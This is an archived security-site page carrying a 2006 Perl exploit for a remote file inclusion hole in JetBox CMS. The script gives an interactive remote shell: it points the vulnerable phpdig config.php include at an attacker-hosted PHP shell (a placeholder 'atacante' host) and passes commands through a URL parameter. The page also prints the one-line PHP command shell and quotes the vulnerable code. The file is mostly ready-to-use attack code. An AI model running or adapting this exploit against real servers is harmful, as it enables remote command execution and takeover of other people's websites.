jetboxCMS.txt

jetboxCMS.txt: Posted May 6, 2006; Authored by beford; JetBox CMS remote file inclusion exploit that allows for command execution.; tags | exploit, remote, file inclusion; SHA-256 | 6bb97b240608bb11c9ab173820e3e278793a4e618c1ac8e49d99bfbee4906bdd; Download | Favorite | View

jetboxCMS.txt

#!/usr/bin/perl

############

# JetBox CMS Remote File Include
# Exploit & Advisory:  beford <xbefordx gmail com>

#
# uso:#   perl own.pl <host> <cmd-shell-url> <cmd-var>

#     perl own.pl http://host.com/jet/ http://atacante/shell.gif cmd
#

# cmd shell example: <? system($cmd); ?>

# cmd variable: cmd;
#
#############
# Description
###########
# Vendor: http://jetbox.streamedge.com/
# The file jetbox/includes/phpdig/includes/config.php uses the variable
# relative_script_path in a include() function without being declared.
# This issue has already been fixed in phpdig, but jetbox still uses a
# vulnerable version.
############
# Vuln code
############
#if (is_file("$relative_script_path/locales/$phpdig_language-language.php"))
#    {include "$relative_script_path/locales/$phpdig_language-language.php";}
#else
#    {include "$relative_script_path/locales/en-language.php";}
############

use LWP::UserAgent;


$Path = $ARGV[0];

$Pathtocmd = $ARGV[1];

$cmdv = $ARGV[2];

if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv) { usage(); }

head();

while()

{

  print "[shell] \$";

  while(<STDIN>)      {

    $cmd=$_;

    chomp($cmd);
    if (!$cmd) {
      last;
    }

    $xpl = LWP::UserAgent->new() or die;

    $req = HTTP::Request->new(GET
=>$Path.'includes/phpdig/includes/config.php?relative_script_path='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or
die "\nCould Not connect\n";

    $res = $xpl->request($req);

    $return = $res->content;

    $return =~ tr/[\n]/[ê]/;

    
    if ($return =~/Error: HTTP request failed!/ || $return =~/: No se
puede ejecutar un comando en blanco <b>/) {
      print "\nNo se puede conectar al host de la cmd o el comando es invalido\n";
      exit;
    } elsif ($return =~/^<br.\/>.<b>Fatal.error/) {
      print "\nComando Invalido, o no hubo respuesta\n\n";
    }
    if ($return =~ /(.*)/) {

      $finreturn = $1;

      $finreturn=~ tr/[ê]/[\n]/;

      print "\r\n$finreturn\n\r";

      last;

    } else {
      print "[shell] \$";
    }

  }

} last;


sub head()  {

   print "\n============================================================================\r\n";

   print " JetBox CMS Remote File Include\r\n";

   print "============================================================================\r\n";

 }


sub usage() {

   head();

   print " Usage: perl own.pl <host> <url-cmd> <var>\r\n\n";

   print " <host> - Full Path : http://host/claroline/ [remember the
trailing slash noob]\r\n";

   print " <url-cmd> - PhpShell : http://atacate/shell.gif \r\n";

   print " <var> - var name used in phpshell : cmd  \r\n";

   exit();

 }

Top Authors In Last 30 Days

Red Hat 228 files
Ubuntu 55 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Google Security Research 6 files
Apple 6 files
Milad Karimi 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,333)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,578)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,460)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

jetboxCMS.txt

jetboxCMS.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

jetboxCMS.txt

Share This

jetboxCMS.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems